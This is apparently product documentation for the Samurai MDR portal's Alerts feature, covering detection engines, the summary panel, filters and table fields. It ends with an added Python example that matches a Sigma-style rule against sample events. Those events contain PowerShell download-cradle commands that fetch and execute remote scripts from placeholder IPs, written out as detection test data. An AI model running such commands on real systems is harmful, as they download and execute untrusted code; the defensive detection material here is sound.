
Alerts

What is an alert?

An alert is a security detection made either by the Samurai platform itself or by a third-party vendor product from which Samurai is ingesting telemetry.

How are alerts triggered?

Alerts are triggered by detection engines based on single or multiple events. The Samurai MDR portal displays alerts categorized according to the underlying detection engine. These categories include:

  • Samurai platform

    • Real-time engine - Proprietary NTT-developed detection engine that leverages behaviour modeling, machine learning, and the latest threat research to automatically identify suspected threats during real-time analysis of telemetry ingested into the Samurai platform.
    • Hunting engine - Intelligence-driven detection engine based on the Sigma project but customized by NTT with additional detection capabilities. The Samurai hunting engine performs automated threat hunting to identify and alert on possible adversary activity.
  • Vendor

    • Alerts generated by and collected from third-party vendor technologies which are integrated with the Samurai platform (e.g. Endpoint Detection & Response (EDR) and firewall technologies)

We are working on additional documentation which will walk through the Samurai platform concepts and usage in more depth, so look out for updates!

What alerts are displayed within the Samurai MDR portal?

We display the same alerts as our Samurai Security Operation Centre (SOC) analysts view.

Do I need to review and act on alerts?

No. The Samurai SOC analysts triage, investigate and validate alerts as part of your Managed Detection & Response (MDR) service. As alerts are validated and investigated by the Samurai SOC analysts, they may lead to a reported Security Incident and are marked accordingly. Our strategy is built on visibility and transparency of the service we provide to you; the alerts feature gives you that visibility and shows the value of the service. Refer to the Alert Dashboard, which provides key alert metrics over a given time period.

Next Steps

To further understand Alerts within the Samurai MDR portal we recommend you review the Alerts View article.

1 - Alerts View

In this article, all elements of the Alert View are outlined to help you understand the alerts displayed.

  1. Log in to the Samurai MDR portal
  2. Click Analysis on the main menu and select Alerts

Figure 1: Alert view example

Alerts Summary

Alerts are summarized in a panel which can be updated based on a specified time period and includes:

  • Security Incidents - the total number of security incidents reported to you; each may correspond to one or more alerts.
  • Alerts - the total number of alerts detected by the Samurai platform and by third-party vendor products integrated with the Samurai platform.
  • Real-time engine - the total number of alerts detected by the Samurai real-time engine.
  • Hunting engine - the total number of alerts detected by the Samurai hunting engine.
  • Vendor - the total number of alerts collected from third-party vendor products integrated with the Samurai platform.

Figure 2: Alerts summary example

Filters

Various filters are available to determine the alerts to be displayed.

Figure 3: Time and Display filter

The total number of alerts within the alerts table is displayed to the left of the Time Period filter.

Time period

You can update all panels to a specific date and time range. The default is the Last 24 hours; Quick time ranges are also provided.

Figure 4: Date and time selection

Display Filter

Enter any values you wish to filter and highlight within the display filter.

Figure 5: Display filter

Alert Column Filter

Adjust and show/hide any of the column values within the Alert Table.

Figure 6: Alert column filter

Alerts Table

All alerts are listed within the alert table. Note that the table is limited to 10,000 alerts, so apply filters to narrow the results if your time period returns more than that.

What are the Alert table fields?

Review the table below outlining each field displayed:

  • Timestamp - Local date and time when the alert was generated, displayed in the format [yyyy:mm:dd] [hh:mm:ss]; hovering over it displays the Coordinated Universal Time (UTC) value and the local timezone offset
  • Incident - If the alert is associated with a reported security incident (one or more alerts may be associated with a single security incident), a link to the security incident is displayed
  • Action - The parsed action in the underlying event(s)
  • Signature - Signature name from the detecting engine; this could be from an integrated telemetry source (vendor) or from a Samurai platform detection engine
  • Source - Initiating source, represented as hostname(s), IP address, user or URL
  • Source Port - The initiating source port
  • Destination - The destination, represented as hostname(s), IP address, user or URL
  • Destination Port - Destination port number
  • Protocol - Network protocol, e.g. TCP / UDP
  • User - User from the underlying event(s)
  • MITRE - The MITRE ATT&CK tactic mapping; this could include one or more tactics. For further information refer to the ATT&CK Matrix for Enterprise
  • Detection - The detection engine triggering the alert. Refer to How are alerts triggered?
  • ID - Alert ID (not displayed by default)

If MULTI is displayed in any field it denotes multiple distinct entries, e.g. an alert built from events with several destinations shows MULTI in the Destination field. Some fields may also be blank if the Samurai platform does not have the underlying data.
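The following is an added example, not NTT code, not a Samurai hunting rule and not the portal's implementation. It ties together two parts of this page: the Sigma-based hunting engine described under "How are alerts triggered?" and the alert table fields above. A hypothetical Sigma-style rule (selection with contains/endswith modifiers, Sigma's case-insensitive string matching) is evaluated over a few constructed process events; matching events are folded into one alert record whose multi-valued fields collapse to MULTI and whose empty fields are left blank, and the resulting alerts are counted per detection engine the way the Alerts Summary panel does. The rule, the events and the field names are all assumptions made for this example.

```python
"""Added example: Sigma-style hunting rule -> alert record -> per-engine summary."""
from collections import Counter

# Constructed sample events (not real telemetry). Two PowerShell download
# cradles on different hosts and one benign notepad launch.
EVENTS = [
    {"host": "ws-01", "user": "alice",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/a.ps1')",
     "dst_ip": "198.51.100.7", "dst_port": 80, "proto": "TCP"},
    {"host": "ws-02", "user": "bob",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.9/b.ps1')",
     "dst_ip": "203.0.113.9", "dst_port": 443, "proto": "TCP"},
    {"host": "ws-03", "user": "carol",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "dst_ip": "", "dst_port": None, "proto": ""},
]

# Hypothetical rule in the Sigma 'detection' layout: keys inside a selection
# are ANDed, a list of values for one key is ORed, and 'condition' names the
# selection to use. Tags use Sigma's attack.<tactic> convention.
RULE = {
    "title": "PowerShell Download Cradle (example rule)",
    "tags": ["attack.execution", "attack.command_and_control"],
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "Net.WebClient"],
        },
        "condition": "selection",
    },
}


def _match_field(event, spec, wanted):
    """Evaluate one 'field|modifier' entry; Sigma string matching is case-insensitive."""
    name, _, modifier = spec.partition("|")
    actual = str(event.get(name) or "").lower()
    candidates = wanted if isinstance(wanted, list) else [wanted]
    for w in candidates:
        w = str(w).lower()
        if modifier == "contains" and w in actual:
            return True
        if modifier == "endswith" and actual.endswith(w):
            return True
        if modifier == "startswith" and actual.startswith(w):
            return True
        if modifier == "" and actual == w:
            return True
    return False


def matches(rule, event):
    """True when every selection entry matches (only 'condition: selection' is supported here)."""
    det = rule["detection"]
    if det.get("condition") != "selection":
        raise NotImplementedError("this example only handles 'condition: selection'")
    return all(_match_field(event, k, v) for k, v in det["selection"].items())


def summarize(values):
    """Collapse one field across events: single value, MULTI for several, blank if none."""
    distinct = {v for v in values if v not in (None, "")}
    if not distinct:
        return ""
    if len(distinct) == 1:
        return str(distinct.pop())
    return "MULTI"


def build_alert(rule, events, engine="Hunting engine"):
    """Fold all events matching the rule into one alert record with the table's fields."""
    hits = [e for e in events if matches(rule, e)]
    if not hits:
        return None
    tactics = sorted(t[len("attack."):] for t in rule["tags"] if t.startswith("attack."))
    return {
        "Signature": rule["title"],
        "Detection": engine,
        "MITRE": tactics,
        "Source": summarize(e["host"] for e in hits),
        "Destination": summarize(e["dst_ip"] for e in hits),
        "Destination Port": summarize(e["dst_port"] for e in hits),
        "Protocol": summarize(e["proto"] for e in hits),
        "User": summarize(e["user"] for e in hits),
        "event_count": len(hits),
    }


def alert_summary(alerts):
    """Counts as in the Alerts Summary panel: total plus one bucket per detection engine."""
    return {"Alerts": len(alerts), **Counter(a["Detection"] for a in alerts)}


if __name__ == "__main__":
    alert = build_alert(RULE, EVENTS)
    print(alert)
    print(alert_summary([alert] if alert else []))
```

Because the two matching events come from different hosts, users and destinations, Source, User, Destination and Destination Port collapse to MULTI while Protocol stays TCP; the benign notepad event never matches, so an alert built only from it would be None rather than a row with blank fields. A real engine also has to decide how it groups events into one alert (here: everything that matched in the batch), and that grouping is what makes MULTI appear.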